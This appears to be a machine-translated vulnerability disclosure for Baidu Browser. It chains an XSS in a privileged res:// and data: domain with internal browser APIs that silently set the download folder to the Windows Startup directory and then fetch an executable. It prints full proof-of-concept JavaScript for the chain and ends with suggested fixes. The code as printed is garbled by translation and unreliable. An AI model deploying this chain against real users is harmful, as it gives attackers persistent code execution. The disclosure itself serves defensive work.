Baidu Browser Remote Command Execution 5

Baidu Browser Remote Command Execution 5

1. first, open a local page in the Baidu browser, such as file: // C:/xxxxxx. You will find the following error: location in the F12 console. href view, you can see that the URL is changed to: data: text/html, biduwebdata

Do not wonder why I did this test, because the data: text/html and biduwebdata domains in Baidu browser 6 have XSS, so I actually want to see data: text/html, does biduwebdata also exist in version 7? Can you see that the URL we entered is output on the page? Is it not escaped here?


 

Therefore, use the following code to test in the bdbrowser domain (because the http domain cannot be redirected to the file domain, test in the bdbrowser domain ):

Location. href = 'file: // C:/xxxxxx # "> '

You can see the pop-up window.
 

2. There are 2nd questions: data: text/html, and biduwebdata are data protocols. Is this Protocol privileged? The answer is: Baidu browser 6 is not available, but the latest version, data: text/html, biduwebdata, the URL is privileged, but other data: xxx does not exist.

3. In this way, our first step is to have the privileged domain XSS. However, how do we redirect from the http domain to the file domain?

A. Are we redirected to A non-existent protocol?
 

It seems that it cannot achieve the same effect as the file domain.

B. The about protocol directly opens a blank page.

C. There is also a common res: // protocol. Let's try ~~

location.href='res:///C:/xxxxxx#">'

 

As shown in, we can see that the res Protocol achieves the same effect as the file protocol, and the http protocol can jump to the res protocol.

4. Therefore, we have XSS. How can we execute commands? I have tested some APIs that have been tested before, such as skin downloads and plug-in downloads, and have made certain security restrictions. However, there is a conspicuous feature:


 

It involves two parts:



One is silent download, that is, you can download a specified program to the download directory without user interaction.

Second, download directory settings.



If we set it to silent download, point the download directory to the user's startup directory, and ask the user to download an exe, then the exe will be downloaded to the user's startup directory.



5. With the XSS in the privileged domain, it is not difficult to implement the above ideas. The code is provided directly here, and the Code contains comments.



A. Redirect to res: //..., trigger XSS, call baidupoc5.js

<Html> 

B. The baidupoc5.js code is as follows:
 

Var isWin7 =/NT \ s + 6 /. test (navigator. userAgent);/* Get username */function getUserNameCallback (id, res) {console. log (arguments); if (! Res) {console. log ("download skin error"); return;} var data = JSON. parse (res); var path = data. body. path; var d = path. substring (0, 1); var user = isWin7? (Path. match (/\ Users \ ([^ \] +) \/) | ["", ""]) [1] :( path. match (/\ Documents and Settings \ ([^ \] +) \/) | ["", ""]) [1]; console. log (path); console. log (user); setDownloadDir (d, user);}/* set the download directory */function setDownloadDir (d, user) {var win7 = d + ": // Users/"+ user +"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"; var xp = d + ": // Documents and Settings/"+ user +"/"start" menu/Program/start/"; var dir = isWin7? Win7: xp; window. external. startRequest (1058, "set_string_pref", "", "[\" download_default_directory \ ", \" "+ dir +" \ "]"); console. log ("download directory"); setTimeout (function () {setDownloadSilent ()}, 100);}/* silent download */function setDownloadSilent () {window. external. startRequest (1059, "set_boolean_pref", "", "[\" download_auto_save \ ", true]"); console. log ("download settings"); setTimeout (function () {startDownload ()}, 100);}/* start to download */function startDownload () {console. log ("download exe"); location. href =" http://192.168.1.13/calc.exe ";}/* Entry */function main () {window. external. startRequest (1057, "theme_apply", "getUserNameCallback", "[{\" md5 \ ": \" 0a696bf6144f37186eb2ba4b637c97da \ ", \" id \ ": \" nickname \", \ "src \":\" http://webimg.br.baidu.com/odin/201410/0a696bf6144f37186eb2ba4b637c97da.jpg \ ", \" Thumb \":\" http://webimg.br.baidu.com/odin/201410/a57d9c085d1cca1c16a1265f0bea040e.jpg \ ", \" Subject \ ": \" \ ", \" tone \ ": 0, \" tag \ ": \" \", \ "desc \": \ "\", \ "from \": 0, \ "themeId \": \ "41 \", \ "name \": \ "bridge night scene \", \ "category \": \ "featured \", \ "position \": 4}] ");} main ();

 

The above code is tested in Win7 as follows:


 

Xp is also tested.

Solution:

Fix XSS in data: text/html and biduwebdata,

When setting the user download directory, the browser needs to enable certain user interaction to avoid changing this setting by setting a privileged domain XSS.